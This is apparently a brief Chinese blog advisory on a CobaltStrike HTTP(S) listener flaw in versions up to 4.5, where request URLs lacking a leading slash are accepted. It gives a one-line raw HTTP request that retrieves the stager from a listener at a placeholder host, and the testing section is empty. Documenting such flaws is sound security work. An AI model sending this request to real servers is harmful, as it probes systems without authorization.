CS新特征


基本描述

CobaltStrike的HTTP(s)监听器对请求URL未进行”/“开头验证,攻击者可通过指定URL获取相关信息。

有效载荷

GET stager HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0

测试过程

影响范围

CobaltStrike <= 4.5


文章作者: DongHuangT1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY-NC 4.0 许可协议。转载请注明来源 DongHuangT1 !
评论
 本篇
CS新特征 CS新特征
CobaltStrike是一款基于Java编写的全平台多方协同后渗透攻击框架,几乎覆盖了APT攻击链中所需要用到的各个技术环节。
2022-01-10
下一篇 
信息收集 信息收集
╔═══════════════╗
║ “复制粘贴” 之信息收集 ║
╚═══════════════╝
2021-03-10
  目录